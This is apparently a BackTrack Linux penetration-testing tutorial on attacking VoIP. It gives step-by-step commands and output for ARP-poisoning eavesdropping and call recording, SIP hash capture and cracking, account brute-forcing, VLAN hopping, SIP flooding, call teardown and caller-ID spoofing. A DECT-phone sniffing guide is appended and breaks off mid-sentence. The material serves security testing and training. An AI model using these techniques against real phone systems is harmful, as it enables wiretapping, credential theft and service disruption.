Once VoIPong detects a phone call it will start capture it once it

finish VoIPong will stop the capture process and will render it to a

playable wave file. All conversation will be saved into the

“/pentest/voip/voipong/output” folder 

Playing the file:

Vomit

Vomit converts a Cisco IP phone RTP conversation into a wave file

that can be played with ordinary sound players. Vomit requires a

tcpdump output file. In order to get vomit up and running we will

need to download and install waveplay Get it

here: http://dir.filewatcher.com/d/FreeBSD/distfiles/Other/wavep

lay-20010924.tar.gz.5731.html 

root@bt:~# tar -xzvf waveplay-20010924.tar.gzwaveplay-20010924/waveplay-20010924/Makefilewaveplay-20010924/waveplay.cwaveplay-20010924/waveplay.ja.1waveplay-20010924/wavefmt.hwaveplay-20010924/READMEwaveplay-20010924/waveplay.1waveplay-20010924/README.jproot@bt:~# cd waveplay-20010924root@bt:~/waveplay-20010924# makecc -c -o waveplay.o waveplay.ccc waveplay.o -o waveplayroot@bt:~/waveplay-20010924# cp waveplay /usr/bin/

root@bt:/pentest/voip/vomit# ./vomit-r sip.dump | waveplay -S8000 -B16 -C1

UCsniff

UCSniff is a VoIP & IP Video Security Assessment tool that

integrates existing open source software into several useful

features, allowing VoIP and IP Video owners and security

professionals to rapidly test for the threat of unauthorized VoIP

and Video Eavesdropping. UCSniff supports Arp poisoning, VLAN

Hopping, VLAN Discovery via CDP, it has a sniffer capabilities and

more… I consider it as an all in one eavesdropping tool. Let’s take a

look at some usage examples:

UCSniff can operate in 2 modes

Monitor mode – Should be used on a shared media where the IP phones

connected to i.e : a HUB, wireless access point, it can be also be used in a

switched environment by setting up a SPAN sessions on a Cisco switch.

Man in the middle mode – This mode has 2 additional modes which are

Learning Mode

Targeted Mode

Preparing UCSniff so we can run it from any location in

backtrack: 

root@bt:/tmp# cd /pentest/voip/ucsniff/root@bt:/pentest/voip/ucsniff# ./configureroot@bt:/pentest/voip/ucsniff# makeroot@bt:/pentest/voip/ucsniff# make install

Monitor Mode Usage

root@bt:/tmp/ucsniff# ucsniff -i eth0 -MUCSniff 2.1 startingRunning in Monitor ModeFile directory-users.txt can't be opened for reading in working directoryFile targets.txt can't be opened for reading in working directoryListening on eth0... (Ethernet) eth0 -> 00:0C:29:84:98:B2 192.168.1.105 255.255.255.0

Starting Unified sniffing...Warning: Please ensure that you hit 'q' when you are finished with this program.Warning: 'q' re-ARPs the victims. Failure to do so before program exit will result in a DoS.

SIP Call in progress. (extension 200, ip 192.168.1.104) calling (extension 201, ip 192.168.1.118)

SIP Call in progress. (extension 200, ip 192.168.1.105) calling (extension 201, ip 192.168.1.104)SIP Call ended. Conversation recorded in file '200-Calling-201-5:2:7-3-both.wav'SIP Call ended. Conversation recorded in file '200-Calling-201-5:2:8-2-both.wav'Closing text interface...

Unified sniffing was stopped.

We can stop the sessions by pressing on the Q key.

Several files were created by UCSniff: Log files – Contains

detailed information about sip transactions Pcap files – capture

file which can be viewed in wireshark audio wav files –

conversation audio files

root@bt:/tmp/ucsniff# ls -ltotal 376-rw-r--r-- 1 root root 40854 Feb 5 05:02 200-Calling-201-5:2:7-3-both.wav-rw-r--r-- 1 root root 115818 Feb 5 05:02 200-Calling-201-5:2:7-3.pcap-rw-r--r-- 1 root root 46294 Feb 5 05:02 200-Calling-201-5:2:8-2-both.wav-rw-r--r-- 1 root root 103940 Feb 5 05:02 200-Calling-201-5:2:8-2.pcap-rw-r--r-- 1 root root 278 Feb 5 05:02 call_detail_log-rw-r--r-- 1 root root 317 Feb 5 05:02 call_log-rw-r--r-- 1 root root 10063 Feb 5 05:02 sip.log-rw-r--r-- 1 root root 39073 Feb 5 05:02 sipdump.pcap-rw-r--r-- 1 root root 0 Feb 5 05:01 skinny_log

MITM Learning Mode Usage

This mode uses a signaling protocol (SIP, Skinny) to map

extensions to an IP Addresses. You can customize the targets

to only intercept specific IP Addresses or Networks. In the

following example we assume we are on the VoIP VLAN

UCSniff will Arp poison all hosts on the subnet. 

root@bt:/tmp/ucsniff# ucsniff -i eth0 // //UCSniff 2.1 startingListening on eth0... (Ethernet) eth0 -> 00:0C:29:84:98:B2 192.168.1.105 255.255.255.0Randomizing 255 hosts for scanning...Scanning the whole netmask for 255 hosts...* |==================================================>| 100.00 %ARP poisoning victims: GROUP 1 : ANY (all the hosts in the list) GROUP 2 : ANY (all the hosts in the list)Mapped new target entry: (IP: 192.168.1.118) --> extension 201 and name:Mapped new target entry: (IP: 192.168.1.104) --> extension 200 and name:SIP Call in progress. (extension 201, ip 192.168.1.118) calling (extension 200, ip 192.168.1.104)SIP Call ended. Conversation recorded in file '201-Calling-200-5:13:4-2-both.wav'Closing text interface...ARP poisoner deactivated.RE-ARPing the victims...Unified sniffing was stopped.

If we take a look at UCSniff log files we can see the discovered targets used in the attack. 

root@bt:/tmp/ucsniff# cat targets.txt192.168.1.118,201,,sip192.168.1.104,200,,sip

MITM Target Mode

Target Mode enables Eavesdropping at a layer higher than just

random audio streams or the IP address of phones for which

you don't know the extension. This mode has 2 sub modes:

Targeted User Targeted Conversation We can add targets

manually to the “targets.txt” file in the following format:

x.x.x.x,extension,,sip 192.168.1.118,201,,sip Or use learning

mode to auto discover hosts 

root@bt:/tmp/ucsniff# ucsniff -i eth0 -TUCSniff 2.1 startingFile targets.txt can't be opened for reading in working directoryNo targets have been previously discovered in Targets file, targets.txtPlease run UCSniff in learning mode, or manually edit targets.txt

Once a valid targets.txt file is found you will be asked to choose an eavesdropping mode: 

root@bt:/tmp/ucsniff# ucsniff -i eth0 -TUCSniff 2.1 startingParsed 2 entries in Targets file, targets.txtUCSniff running in target mode. Parsed 2 previously discovered targetsPlease select a Targeted Eavesdropping Mode:1. UserDescription: Eavesdrop on all calls to or from a particular endpoint.2. ConversationDescription: Eavesdrop on bi-directional conversation flows between two selected endpoints.Please select option (1) or (2):

Selecting "User" tells the tool to intercept all traffic between the one Target, and the rest of the network. 

In "Conversation", two endpoints are selected and the network

is ARP Poisoned to only intercept the traffic between those two

users. 

UCSniff includes more useful tools and attacks modes like

VLAN hopping (using ACE) which will be discussed later. 

Xplico

Although Xplico is not in the Backtrack voip tools directory, it is

a very useful tool for capturing SIP and RTP traffic (among

other protocols). Xplico can be found in the Backtrack ->

Digital Forensics -> Forensic Analysis menu 

In case it is not present on your Backtrack installation you can

simply install it by issuing the following command: 

root@bt:~# apt-get install xplico

Xplico can be used to capture live traffic or import a Wireshark PCAP capture file. Either way Xplico will decode the captured packets and will assemble them into the appropriate format In our case it will be SIP and RTP. After executing Xplico you will be asked to login, the default username and password are: xplico 

Once we have successfully logged in to Xplico we will need to

create a case 

We will be asked to choose between a live capture or to import

a PCAP file In this example we will use Xplico to perform a live

capture (we will Arp poison our targets in the background using

arpspoof). Now we will have to choose our case and create a

new session 

By choosing our newly created session we will see our main

statistics page with the option to choose our network adapter

and start/stop the capture process. 

Here is an example for captured SIP traffic: 

An example for RTP decoded traffic: 

Capturing SIP Authentication using SIPDump

SIPDump is a part of the SIPCrack tools suite, it allows

performing a live capture of SIP authentication digest response

or it can dump a previously captured sessions from a PCAP

file. SIPDump Usage: 

root@bt:/pentest/voip/sipcrack# ./sipdump -i eth0SIPdump 0.3 ( MaJoMu | www.codito.de )---------------------------------------Usage: sipdump [OPTIONS] = file where captured logins will be written to Options: -i = interface to listen on -p = use pcap data file -m = enter login data manually -f "" = set libpcap filter* You need to specify dump file

Live capture using SIPDump: 

root@bt:/pentest/voip/sipcrack# ./sipdump -i eth0 auth.txtSIPdump 0.3 ( MaJoMu | www.codito.de )---------------------------------------* Using dev 'eth0' for sniffing* Starting to sniff with packet filter 'tcp or udp or vlan'* Dumped login from 192.168.1.104 -> 192.168.1.111 (User: '200')* Dumped login from 192.168.1.104 -> 192.168.1.111 (User: '200')* Dumped login from 192.168.1.104 -> 192.168.1.111 (User: '200')

Dumping authentication data from a PCAP file 

root@bt:/pentest/voip/sipcrack# ./sipdump -p /root/registration.pcap auth.txtSIPdump 0.3 ( MaJoMu | www.codito.de )---------------------------------------* Using pcap file '/root/registration.pcap' for sniffing* Starting to sniff with packet filter 'tcp or udp or vlan'* Dumped login from 192.168.1.104 -> 192.168.1.101 (User: '200')* Exiting, sniffed 1 logins

SIPDump will write the authentication challenge response to the specified file which looks as follows: 

192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"44b80d16""""MD5"8edc2d549294f6535070439fb069c968192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"46cce857""""MD5"4dfc7515936a667565228dbaa0293dfc192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"2252e8fe""""MD5"5b895c6ae07ed8391212119aab36f108

We will disscuss cracking these challenges in the attacking authentication chapter.

Attacking Authentication

SIP can be susceptible to 2 types of authentication attacks,

before we take a look at these attacks types let’s understand

how’s a SIP registration and authentication process takes

place. SIP uses a digest authentication which is a mechanism

that the HTTP protocol uses and known as HTTP digest.

Because SIP is an ASCII based protocol the authentication

details are hashed in order to prevent them to transport in clear

text. When a SIP client (User Agent) wants to authenticate with

a SIP server, the server generates and sends a digest

challenge to the client, it contains the following parameters: 

Realm - used to identify credentials within as SIP message,

usually it is the sip domain. Nonce - this is an md5 unique

string which is generated by the server for each registration

request it is made from a time stamp and a secret phrase to

ensure it has a limited lifetime and could be not be used again.

Once the client receives the digest challenge and the user

enters his credentials the client uses the nonce to generate a

digest response and sends it back to the server. 

With that said, let’s try to crack the digest response in order to

obtain a valid SIP account password. 

Cracking SIP Digest response hashes

Backtrack provides a great tool called SIPCrack, We already

discussed how to capture a valid SIP authentication digest

response using SIPDump. SIPCrack can be found in 

root@bt:/pentest/voip/sipcrack#

SIPCrack Usage:

root@bt:/pentest/voip/sipcrack# ./sipcrackSIPcrack 0.3 ( MaJoMu | www.codito.de )----------------------------------------Usage: sipcrack [OPTIONS] [ -s | -w ] = file containing logins sniffed by SIPdump Options:

-s = use stdin for passwords -w wordlist = file containing all passwords to try -p num = print cracking process every n passwords (for -w) (ATTENTION: slows down heavily)* Either -w or -s has to be given

SIPCrack can operate in two modes:

Dictionary attack

STDIN

Dictionary attack

Backtrack provides some basic dictionaries which are

located in: 

root@bt:/pentest/passwords/wordlists

But for the purpose of this article I will use another grate tool in backtrack called Crunch which is used to create custom dictionaries. Let’s use crunch to create a six characters numeric dictionary Crunch is located in: 

root@bt:/pentest/passwords/crunch#

Crunch Usage: 

usage: crunch [-f /path/to/charset.lst charset-name] [-o wordlist.txt] [-t [FIXED]@@@@] [-s startblock] [-c number]

For detailed crunch usage check its manual: 

root@bt:/pentest/passwords/crunch# man crunch

Creating a six chars numeric dictionary:

root@bt:/pentest/passwords/crunch# ./crunch 6 6 -f charset.lst numeric -o /pentest/voip/sipcrack/sipass.txtCrunch will now generate 7000000 bytes of dataCrunch will now generate 6 MB of dataCrunch will now generate 0 GB of data100%

We will use a previously captured sip credentials stored by SIPDump in the auth.txt file ans sipass.txt as the dictionary (which we created using crunch)

Cracking the Digest Response:

root@bt:/pentest/voip/sipcrack# ./sipcrack -w sipass.txt auth.txtSIPcrack 0.3 ( MaJoMu | www.codito.de )----------------------------------------* Found Accounts:Num Server Client User Hash|Password1 192.168.1.101 192.168.1.104 200 3a33e768ed6f630347f4b511371926bd* Select which entry to crack (1 - 1): 1* Generating static MD5 hash... 0a84f78fde66bb15197eab961462dc2f* Starting bruteforce against user '200' (MD5: '3a33e768ed6f630347f4b511371926bd')

* Loaded wordlist: 'sipass.txt'* Starting bruteforce against user '200' (MD5: '3a33e768ed6f630347f4b511371926bd')* Tried 123457 passwords in 0 seconds

* Found password: '123456'* Updating dump file 'auth.txt'... done

Brute Force attack using John The Ripper

For this attack mode we will be using John the ripper to

redirect johns output into the FIFO file which we’ll feed into

SIPCrack. Creating a FIFO file: 

root@bt:/tmp# mkfifo sipcrack

Generating passwords using john and redirecting the output to our FIFO file, for this example we will generate up to 6 digits only. 

root@bt:~# john[*] This script will take you to /pentest/passwords/jtr/[*] From there, run ./john root@bt:/pentest/passwords/jtr# ./john --incremental=digits –stdout=6 > /tmp/sipcrack

Using our FIFO file to crack the password: 

root@bt:/pentest/voip/sipcrack# ./sipcrack -w /tmp/sipcrack auth.txtSIPcrack 0.3 ( MaJoMu | www.codito.de )----------------------------------------

* Found Accounts:Num Server Client User Hash|Password1 192.168.1.111 192.168.1.104 200 8edc2d549294f6535070439fb069c968* Select which entry to crack (1 - 1): 1* Generating static MD5 hash... 0a84f78fde66bb15197eab961462dc2f* Starting bruteforce against user '200' (MD5: '8edc2d549294f6535070439fb069c968')* Loaded wordlist: '/tmp/sipcrack'* Starting bruteforce against user '200' (MD5: '8edc2d549294f6535070439fb069c968')* Tried 3 passwords in 0 seconds* Found password: '123456'* Updating dump file 'auth.txt'... done

Brute forcing SIP Accounts

We can use svcrack which is a part of

the sipvicious tools suite to brute force sip accounts A

single SIP account dictionary attack (You can add a -v or -

vv for verbosity): 

root@bt:/pentest/voip/sipvicious# ./svcrack.py -u200 -d wordlist.txt 192.168.1.104| Extension | Password |------------------------| 200 | 123456 |

A single SIP account brute forcing: 

root@bt:/pentest/voip/sipvicious# ./svcrack.py -u200 -r100000-999999 192.168.1.104| Extension | Password |------------------------| 200 | 123456 |

Use ./svcrack –h for all available arguments. 

VLAN Hopping

Usually VoIP traffic is connected to a dedicated VLAN

(Virtual LAN) as we saw in the topologies section. This

means that we cannot intercept the VoIP traffic by sniffing

and Arp poisoning. The reason for that is that a VLAN is

like a separate network, it has its own broadcast domain

and different IP range than the data network. VLAN

hopping is a way to “hop” to another VLAN, lucky for us

Backtrack includes the necessary tools to perform this

attack. One common topology is where the IP Phone has a

built-in “Internal Switch”, usually the pc is plugged into the

phone pc socket and the phone is connected from its

lan/sw socket to the network switch as follows: 

A typical CISCO switch port configuration for VoIP will look

something like: 

Switch# conf tEnter configuration commands, one per line. End with CNTL/Z.Switch(config)#interface fastEthernet 0/1Switch(config-if)#switchport mode accessSwitch(config-if)#switchport access vlan 10Switch(config-if)#switchport voice vlan 20

The IP phone will be configured with the appropriate VLAN ID (20) and the PC data traffic will flow through VLAN 10. Before we begin hopping around we will have to enable support for the 802.1q protocol in Backtrack by typing: 

root@bt:~# modprobe 8021q

VoIP Hopper

VoIP hopper is used to hop into voice Vlan by behaving

like an IP phone; it supports specific switches and

supports some IP phones models. It currently supports the

brands like: Cisco, Avaya and Nortel. VoIP hopper was

designed to run under Backtrack Linux and currently has

the following features: DHCP Client, CDP Generator, MAC

Address Spoofing and VLAN hopping. Voiphopper usage: 

root@bt:/pentest/voip/voiphopper# ./voiphoppervoiphopper -i <interface> -c {0|1|2} -a -n -v <VLANID>Please specify 1 base option mode:CDP Sniff Mode (-c 0)Example: voiphopper -i eth0 -c 0CDP Spoof Mode with custom packet (-c 1):-D (Device ID)-P (Port ID)-C (Capabilities)-L (Platform)-S (Software)-U (Duplex)Example: voiphopper -i eth0 -c 1 -E 'SIP00070EEA5086' -P 'Port 1' -C Host -L 'Cisco IP Phone 7940' -S 'P003-08-8-00' -U 1CDP Spoof Mode with pre-made packet (-c 2)Example: voiphopper -i eth0 -c 2Avaya DHCP Option Mode (-a):Example: voiphopper -i eth0 -aVLAN Hop Mode (-v VLAN ID):Example: voiphopper -i eth0 -v 200Nortel DHCP Option Mode (-n):Example: voiphopper -i eth0 -n

VoIP Hopper provides many modes for attack please

use the –h for detailed information.

Let’s take a look at an example of sniffing for CDP and run

a VLAN Hop into the Voice VLAN in a Cisco environment.

Run VoIP Hopper on the Ethernet interface, in the

following way: 

root@bt:/pentest/voip/voiphopper# ./voiphopper -i eth0 -c 0

VoIP Hopper also allows one to VLAN Hop to an arbitrary

VLAN, without sniffing for CDP. If you already know the

Voice VLAN ID or would like to VLAN Hop into another

VLAN just specify the vlan id. 

root@bt:/pentest/voip/voiphopper# ./voiphopper -i eth0 -v 20VoIP Hopper 1.00 Running in VLAN Hop mode ~ Trying to hop into VLAN 2Added VLAN 20 to Interface eth0Attempting dhcp request for new interface eth0.20

eth0.20 Link encap:Ethernet HWaddr 00:0c:29:84:98:b2 inet6 addr: fe80::20c:29ff:fe84:98b2/64 Scope:Link UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU:1500 Metric:1

RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:9 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 B) TX bytes:2274 (2.2 KB)

ACE

ACE is another tool for vlan hopping very similar to

Voiphopper in usage and include an option to discover

also TFTP servers (configuration servers). ACE Usage: 

root@bt:/pentest/voip/ace# ./aceACE v1.0: Automated Corporate (Data) EnumeratorUsage: ace [-i interface] [ -m mac address ] [ -t tftp server ip address | -c cdp mode | -v voice vlan id | -r vlan interface | -d verbose mode ]-i <interface> (Mandatory) Interface for sniffing/sending packets-m <mac address> (Mandatory) MAC address of the victim IP phone-t <tftp server ip> (Optional) tftp server ip address-c <cdp mode 0|1 > (Optional) 0 CDP sniff mode, 1 CDP spoof mode-v <voice vlan id> (Optional) Enter the voice vlan ID-r <vlan interface> (Optional) Removes the VLAN interface-d (Optional) Verbose | debug mode

You can manually add a vlan hop or use its discovery feature 

Mode to specify the Voice VLAN ID

Example: ace -i eth0 -v 96 -m 00:1E:F7:28:9C:8E

Mode to auto-discover voice vlan ID in the listening mode for CDPExample: ace -i eth0 -c 0 -m 00:1E:F7:28:9C:8E

Mode to auto-discover voice vlan ID in the spoofing mode for CDPExample: ace -i eth0 -c 1 -m 00:1E:F7:28:9C:8E

TIP: To view your MAC address in backtrack use: 

root@bt:~# macchanger -s eth0

It doesn’t matter if you used voiphopper or ace you can

now intercept VoIP traffic with tools like “ucsniff” by

specifying you newly created interface.

For example: 

root@bt:/pentest/voip/ucsniff# ucsniff -i eth0.20 // //

Denial Of Service

A denial of service attack on VoIP services can render it

useless by causing an intentionally damage to the network

and VoIP systems availability. This attack can occur on

two levels, standard network dos attacks and VoIP specific

dos attacks. Generally we will send tons of data by

flooding the network to consume all its resources or a

specific protocol in order to overwhelm it with tons of

requests. Let’s take a quick overview of the tools available

in Backtrack 

Inviteflood

This tool can be used to flood a target with INVITE

requests it can be used to target sip gateways/proxies and

sip phones. 

root@bt:/pentest/voip/inviteflood# ./invitefloodinviteflood - Version 2.0 June 09, 2006 Usage: Mandatory - interface (e.g. eth0) target user (e.g. "" or john.doe or 5000 or "1+210-555-1212") target domain (e.g. enterprise.com or an IPv4 address) IPv4 addr of flood target (ddd.ddd.ddd.ddd) flood stage (i.e. number of packets) Optional - -a flood tool "From:" alias (e.g. jane.doe)

-i IPv4 source IP address [default is IP address of interface] -S srcPort (0 - 65535) [default is well-known discard port 9] -D destPort (0 - 65535) [default is well-known SIP port 5060] -l lineString line used by SNOM [default is blank] -s sleep time btwn INVITE msgs (usec) -h help - print this usage -v verbose output mode

A basic usage syntax looks like this: 

./inviteflood eth0 target_extension target_domain target_ip number_of_packets

As long the tool keeps flooding the sip gateway it will

prevent users from making phone calls. You can flood the

sip proxy with an inexistent extension thus making it

generating a 404 not found just to keep it busy. 

Rtpflood

Rtp flood is used to flood a target IP phone with a UDP

packet contains a RTP data In order to launch a

successful attack using rtpflood you will need know the

RTP listening port on the remote device you want to

attack, for example; x-lite sofphone default rtp port is

8000. 

root@bt:/pentest/voip/rtpflood# ./rtpfloodusage: ./rtpflood sourcename destinationname srcport destport numpackets seqno timestamp SSID

Iaxflood

IAXFlood is a tool for flooding the IAX2 protocol which is

used by the Asterisk PBX. 

root@bt:/pentest/voip/iaxflood# ./iaxfloodusage: ./iaxflood sourcename destinationname numpackets

Teardown

Teardown is used to terminate a call by sending a bye

request 

./teardown eth0 extension sip_proxy 10.1.101.35 CallID FromTag ToTag

First you will need to capture a valid sip OK response and use its from and to tags and a valid caller id value. 

SIP/2.0 200 OKVia: SIP/2.0/UDP 192.168.1.105;branch=z9hG4bKkfnyfaol;received=192.168.1.105;rport=5060From: "200" ;tag=hcykdTo: "200" ;tag=as644fe807Call-ID: jwtgckolqnoylqf@backtrackCSeq: 134 REGISTERUser-Agent: Asterisk PBXAllow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY

Supported: replacesExpires: 3600Contact: ;expires=3600Date: Tue, 01 Feb 2011 17:55:42 GMTContent-Length: 0

If you specify the “-v” option you can see the payload: 

SIP PAYLOAD for packet:BYE sip:200@192.168.1.104:5060 SIP/2.0Via: SIP/2.0/UDP 192.168.1.105:9;branch=91ca1ba5-98ee-44d5-9170-61c30981c565From: <sip:192.168.1.104>;tag=hcykdTo: 200 <sip:200@192.168.1.104>;tag=as644fe807Call-ID: jwtgckolqnoylqf@backtrackCSeq: 2000000000 BYEMax-Forwards: 16User-Agent: HackerContent-Length: 0Contact: <sip:192.168.1.105:9>

Spoofing Caller ID

There are several methods for spoofing Caller ID which we

won’t discuss here because it requires a different set of

tools and equipment which are irrelevant to this article

purpose. Spoofing Caller ID in SIP is fairly easy, you just

need to change the SIP request “INVITE” from header. 

INVITE sip:@127.0.0.1 SIP/2.0To: <sip:192.168.1.104>Via: SIP/2.0/UDP 192.168.1.104From: "Evil Hacker"Call-ID: 14810.0.1.45CSeq: 1 INVITEMax-Forwards: 20 Contact: <sip:127.0.0.1>

We will take a look at a tool we have already discussed called Inviteflood which can be used to send spoofed invite requests. 

root@bt:/pentest/voip/inviteflood# ./inviteflood eth0 201 192.168.1.104 192.168.1.104 1 -a "Backtrack"

Attacking VoIP Using Metasploit

The Metasploit framework includes several auxiliaries and

modules dedicated for VoIP exploitation. You can find

them by using the search function with keywords such as

“sip” or “voip”. Let’s Launch “msfconsole” and perform a

search for available modules: 

root@bt:~# msfconsole

msf > search sip

Metasploit VoIP Modules

Here’s a complete list of the available modules for you

reference:

Auxiliaries

scanner/sip/enumerator - SIP Username Enumerator

(UDP) scanner/sip/enumerator_tcp - SIP Username

Enumerator (TCP) scanner/sip/options - SIP Endpoint

Scanner (UDP)scanner/sip/options_tcp - SIP Endpoint

Scanner (TCP) voip/sip_invite_spoof - SIP Invite Spoof

Exploits

windows/sip/aim_triton_cseq - AIM Triton 1.0.4 CSeq

Buffer Overflow windows/sip/sipxezphone_cseq -

SIPfoundry sipXezPhone 0.35a CSeq Field

Overflow windows/sip/sipxphone_cseq - SIPfoundry

sipXphone 2.6.0.27 CSeq Buffer

Overflow unix/webapp/trixbox_langchoice - Trixbox

langChoice PHP Local File Inclusion 

Scanning SIP Enabled Devices

Metasploit provides a sip scanner auxiliary which comes in

two flavors TCP and UDP, we can use it to discover SIP

enabled devices using the OPTION method: Let’s see an

example of the UDP version: scanner/sip/options

auxiliary Auxiliary Options and Usage: 

msf > use auxiliary/scanner/sip/optionsmsf auxiliary(options) > show options

Module options (auxiliary/scanner/sip/options): Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to probe in each set CHOST no The local client address CPORT 5060 no The local client port RHOSTS yes The target address range or CIDR identifier

RPORT 5060 yes The target port THREADS 1 yes The number of concurrent threads TO nobody no The destination username to probe at each host

msf auxiliary(options) > set RHOSTS 192.168.1.130/24RHOSTS => 192.168.1.130/24msf auxiliary(options) > run

[*] 192.168.1.20 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'[*] 192.168.1.21 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'[*] 192.168.1.22 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'[*] 192.168.1.92 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'[*] 192.168.1.140 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'[*] 192.168.1.130 200 server='Asterisk PBX 1.6.2.13' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO'[*] Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completed

Enumerating SIP extensions / Usernames

The scanner/sip/enumerator auxiliary can be used to

discover valid SIP accounts, it supports two methods of

discovery: OPTIONS and REGISTER, it also comes in two

flavors TCP and UDP. Auxiliary options: 

msf > use scanner/sip/enumeratormsf auxiliary(enumerator) > show options

Module options (auxiliary/scanner/sip/enumerator):

Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to probe in each set CHOST no The local client address CPORT 5060 no The local client port MAXEXT 9999 yes Ending extension METHOD REGISTER yes Enumeration method to use OPTIONS/REGISTER MINEXT 0 yes Starting extension PADLEN 4 yes Cero padding maximum length RHOSTS yes The target address range or CIDR identifier RPORT 5060 yes The target port THREADS 1 yes The number of concurrent threads

Example Usage: 

msf auxiliary(enumerator) > set RHOSTS 192.168.1.104RHOSTS => 192.168.1.104msf auxiliary(enumerator) > set MINEXT 100MINEXT => 100msf auxiliary(enumerator) > set MAXEXT 500MAXEXT => 500msf auxiliary(enumerator) > set PADLEN 3PADLEN => 3msf auxiliary(enumerator) > run

[*] Found user: 200 <sip:200@192.168.1.104> [Auth][*] Found user: 201 <sip:201@192.168.1.104> [Auth][*] Found user: 202 <sip:202@192.168.1.104> [Auth][*] Found user: 203 <sip:203@192.168.1.104> [Auth][*] Found user: 204 <sip:204@192.168.1.104> [Auth][*] Found user: 300 <sip:300@192.168.1.104> [Auth][*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed

Spoofing Caller ID auxiliary

The voip/sip_invite_spoof auxiliary will create a fake SIP

invite request making the targeted device ring and display

fake caller id information. Auxiliary Options: 

msf > use voip/sip_invite_spoofmsf auxiliary(sip_invite_spoof) > show options

Module options (auxiliary/voip/sip_invite_spoof):

Name Current Setting Required Description ---- --------------- -------- ----------- MSG The Metasploit has you yes The spoofed caller id to send RHOSTS yes The target address range or CIDR identifier RPORT 5060 yes The target port SRCADDR 192.168.1.1 yes The sip address the spoofed call is coming from THREADS 1 yes The number of concurrent threads

Example Usage: 

msf auxiliary(sip_invite_spoof) > set RHOSTS 192.168.1.104RHOSTS => 192.168.1.104msf auxiliary(sip_invite_spoof) > run

[*] Sending Fake SIP Invite to: 192.168.1.104[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed

Exploiting VoIP systems

Metasploit includes several exploits for sip client software

and even for the Trixbox PBX web management interface.

Although this is not a SIP specific vulnerability it is still

related and can enable a full control by an attacker on a

PBX. 

Closing Words

I hope you’ve found this document informative, please

keep in mind that Backtrack Linux provides many tools and

features we haven’t covered here. Take the time to browse

the tools read the manuals and README’s I am sure you’ll

find the right tool for the job.

Feel free to discuss the tools and methods mentioned here

in the Backtrack Linux Forums we would love to here your

feedback ideas and experiences.

http://www.backtrack-linux.org/forums/

About The Author

Shai rod (aka @NightRang3r) is a full time Pen Tester at

Avnet Information Security & Risk Management in Israel;

He holds the Offensive security OSCP and OSCE

certifications (among others) and manages his blog

at http://exploit.co.il

References

http://en.wikipedia.org/wiki/

Session_Initiation_Protocol

http://tools.ietf.org/html/rfc3261

http://www.hackingvoip.com/

What is DECT?

http://en.wikipedia.org/wiki/Digital_Enhanced_Cordless_Telecommunications

The problem?

Most vendors don’t implement encryption in their devices so one can sniff it with certain

hardware and software. 

For a previous post on the topic,

check: http://www.offensive-security.com/backtrack/sniffing-dect-phones-the-details/

Tested on

BackTrack 5 final x86 KDE with kernel 2.6.38

Original Dosch&Amand Type II PCMCIA Card

SIEMENS C1 DECT Phones set up in repeater mode

NOTE: This is experimental software which is not very actively supported anymore!

Installing dedected

In order to get dedected installed on BackTrack, you have the choice between:

1. Use dedected from the BackTrack 5 repositories.

2. Compile it on your own if you want to experiment.

Install from repository

root@bt:~# apt-get updateroot@bt:~# apt-get install dedected

Install from source

This stage is optional for those wanting to build the tools from source code.

root@bt:~# prepare-kernel-sourcesroot@bt:~# cd /usr/src/linuxroot@bt:~# cp -rf include/generated/* include/linux/root@bt:~# cd /pentest/telephonyroot@bt:~# svn co https://dedected.org/svn/trunk dedected_svnroot@bt:~# cd dedected_svn/com-on-air_cs-linux/root@bt:~# make && make -C tools

Install some additional tools

root@bt:~# apt-get -y install audacity

Load the drivers

root@bt:~# cd /pentest/telephony/dedected/com-on-air_cs-linuxroot@bt:~# make node

If you did not insert your Dosch&Amand Type 2 or Type 3 or Voo:doo # PCMCIA-card do so

now! Next, we load the driver:

root@bt:~# make load

Scan for fixed parts a.k.a. fp (DECT base stations)

root@bt:~# cd /pentest/telephony/dedected/com-on-air_cs-linux/toolsroot@bt:~# ./dect_cli

If you need info on the usage type "help". If you live in the U.S. switch to the US/DECT 6

band via the "band" command. Let's enable someverbosity:

verb

And start scanning for base stations:

fpscan

After scanning 2-3 times through all channels disable verbosity, and stop scanning:

verbstop

Ignore phones you don’t want to sniff (e.g. your neighbours!)

Start a callscan

callscan

Now grab your DECT handset and make a test phonecall and wait until you see the

phonecall .It is also sufficient if you just get a dialing tone. You should see something like

### found new call on 00 82 31 33 73 on channel 7 RSSI 34stop

Name your basestation if you want:

name 00 82 31 33 73 stallowned

Dump all found phones:

dump

Ignore every other phone except yours via the following command! IMPORTANT!!!

ignore 01 30 95 13 37

Record the phone call

Start automaticially recording of every phone call it detects:

autorec

Now grab your DECT telephony handset and do a testcall. I recommend to call a “time

telling serivce” that can be reached over a normal phone number. You should get

something like this:

